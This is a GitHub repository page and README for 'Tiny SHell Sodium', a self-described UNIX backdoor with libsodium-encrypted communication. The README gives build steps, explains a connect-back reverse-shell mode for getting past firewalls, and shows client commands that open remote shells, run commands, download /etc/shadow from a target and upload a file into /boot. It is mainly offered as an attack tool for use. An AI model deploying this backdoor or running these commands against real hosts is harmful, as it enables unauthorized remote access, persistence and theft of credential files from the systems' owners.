GitHub - m1nl/tsh-sodium

Branches Tags

Name		Name	Last commit message	Last commit date
Latest commit History 12 Commits
dist		dist
libsodium @ d3f4804		libsodium @ d3f4804
.gitignore		.gitignore
.gitmodules		.gitmodules
ChangeLog		ChangeLog
Makefile		Makefile
README		README
build-libsodium.sh		build-libsodium.sh
hexutils.c		hexutils.c
hexutils.h		hexutils.h
pel.c		pel.c
pel.h		pel.h
setproctitle.c		setproctitle.c
setproctitle.h		setproctitle.h
tsh.c		tsh.c
tsh.h		tsh.h
tshd.c		tshd.c

Repository files navigation


 Tiny SHell Sodium - An open-source UNIX backdoor with libsodium support


    * Before compiling Tiny SHell Sodium

        1. First of all, you should setup your default public key;
           you can generate your public key using pubkey command
           in tsh client. Then you can pass it as PUBLIC_KEY_STRING
           variable to make and recompile tsh.

        2. It is advised to change SERVER_PORT, the port on which
           the server will be listening for incoming connections.

        3. You may want to start tshd in "connect-back" mode if
           it runs on on a firewalled box; simply uncomment and
           modify CONNECT_BACK_HOST in tsh.h.

        4. Before compiling Tiny SHell Sodium you need to update
           submodules and checkout a stable version of libsodium.
           To build libsodium and install to dist directory, you
           can use build-libsodium.sh script.

        5. Makefile has been updated to use musl-gcc and static
           compilation flags to make the binaries portable.

    * Compiling Tiny SHell

        Run "make <system>", where <system> can be any one of these:
        linux, freebsd, openbsd, netbsd

    * How to use the server

        It can be useful to set $HOME and the file creation mask
        before starting the server:

            % umask 077; HOME=/var/tmp ./tshd -s <client public key>

    * How to use the client

        Make sure tshd is running on the remote host. You can:

        - get public key

            ./tsh -s <password> pubkey

        - start a shell:

            ./tsh -s <password> <hostname>

        - execute a command:

            ./tsh -s <password> <hostname> "uname -a"

        - transfer files:

            ./tsh -s <password> <hostname> get /etc/shadow .
            ./tsh -s <password> <hostname> put vmlinuz /boot

        Note: if the server runs in connect-back mode, replace
        the remote machine hostname with "cb".

    * About multiple file transfers

        At the moment, Tiny SHell does not support scp-like multiple
        and/or recursive file transfers. You can work around this bug
        by simply making a tar archive and transferring it. Example:

        ./tsh -s <password> <hostname> "stty raw; tar -cf - /etc 2>/dev/null" | tar -xvf -

    * About terminal modes

        On some brain-dead systems (actually, IRIX and HP-UX), Ctrl-C
        and other control keys do not work correctly. Fix it with:

            % stty intr "^C" erase "^H" eof "^D" susp "^Z" kill "^U"